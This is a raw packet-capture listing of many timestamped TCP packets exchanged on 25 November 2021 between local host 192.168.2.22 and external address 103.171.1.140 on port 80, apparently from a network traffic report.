                                        Nov 25, 2021 19:23:24.994096041 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994096994 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994133949 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994138002 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994170904 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994174004 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994208097 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994211912 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994246960 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994249105 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994285107 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994288921 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994322062 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994360924 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994379997 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994384050 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994395971 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994399071 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994436026 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994438887 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994472980 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994472980 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994513035 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.995444059 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.996992111 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279172897 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279217958 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279258013 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279284000 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279443979 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279474974 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279496908 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279501915 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279515982 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279529095 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279556036 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279557943 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279582024 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279583931 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279601097 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279622078 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279875040 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279918909 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279931068 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279958963 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279973030 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.279987097 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.279999018 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280041933 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280734062 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.280765057 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.280805111 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280819893 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280824900 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.280884027 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280893087 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.280934095 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.280949116 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280971050 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.280988932 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281019926 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281033993 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281048059 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281055927 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281073093 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281090975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281100988 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281114101 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281128883 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281133890 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281155109 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281169891 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281181097 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281207085 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281208992 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281223059 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281233072 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281244993 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281259060 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281266928 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281286001 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281301975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281313896 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281322956 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281341076 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281354904 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281367064 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281374931 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281394005 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281419992 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281419992 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281441927 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281446934 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281462908 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281474113 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.281486034 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.281519890 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.283430099 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.284014940 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.284053087 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.284075975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.284095049 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285425901 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285464048 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285469055 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285504103 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285686970 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285721064 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285732031 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285756111 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285761118 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285790920 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285804033 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285826921 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285830975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285864115 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285866976 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285900116 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285903931 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285936117 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285937071 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.285972118 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.285974979 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286005974 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286006927 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286041021 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286051035 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286077976 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286086082 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286115885 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286127090 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286151886 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286156893 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286185980 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286190033 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286221027 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286223888 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286256075 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286263943 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286288977 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286298037 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286324024 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286334038 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286359072 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286367893 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286395073 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286400080 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286431074 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286441088 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286465883 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286475897 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286501884 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286506891 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286537886 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286540031 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286571026 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286578894 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286606073 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286607027 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286640882 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286643028 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286675930 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286676884 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286711931 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286712885 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286745071 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286755085 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286780119 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286782026 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286814928 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286815882 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286848068 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286851883 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286881924 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286883116 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286916971 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286919117 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286952019 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286955118 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.286987066 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.286989927 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287024975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287144899 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287178993 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287189007 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287219048 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287226915 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287264109 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287269115 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287298918 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287302017 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287333012 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287338018 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287368059 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287370920 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287401915 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287405968 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287436008 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287446976 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287471056 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287473917 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287506104 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287513971 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287540913 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287550926 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287576914 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287585974 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287611008 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287619114 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287645102 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287653923 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287679911 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287688971 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287714005 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287723064 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287749052 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.287758112 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.287790060 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.289900064 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.291004896 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.570894957 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.570969105 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571166039 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571324110 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571376085 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571383953 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571422100 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571424961 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571463108 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571468115 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571501970 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571506977 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571541071 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571542978 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571577072 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571582079 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571615934 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571625948 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571655035 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571655035 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571691036 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571695089 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571728945 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571732044 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571765900 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571767092 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571805954 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571805954 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571845055 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571846008 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571882010 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571886063 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571919918 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571933985 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571963072 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.571979046 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.571999073 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572016001 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572037935 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572072029 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572076082 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572086096 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572114944 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572117090 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572154045 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572154045 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572190046 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572195053 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572227955 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572228909 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572268009 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572271109 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572304010 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572309017 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572344065 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572345972 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572381973 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572382927 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572421074 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572421074 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572460890 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572462082 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572498083 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572499990 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572536945 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572537899 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572575092 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572576046 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572611094 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572613001 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572649956 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572650909 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572688103 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572689056 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572727919 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572727919 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572767019 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572767973 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572804928 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572807074 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572843075 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572844028 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572905064 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.572926044 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572964907 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.572967052 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573004961 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573004961 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573045969 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573046923 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573082924 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573087931 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573122025 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573122025 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573160887 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573163033 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573199034 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573200941 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573239088 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573239088 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573277950 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573280096 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573316097 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573318005 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573354959 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573355913 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573393106 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573401928 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573431015 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573431969 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573468924 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573470116 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573504925 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573509932 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573544025 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573544979 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573580980 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573582888 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573621035 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573750973 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573813915 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573822975 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573863029 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573864937 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573901892 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573903084 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573941946 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.573944092 CET8049165103.171.1.140192.168.2.22
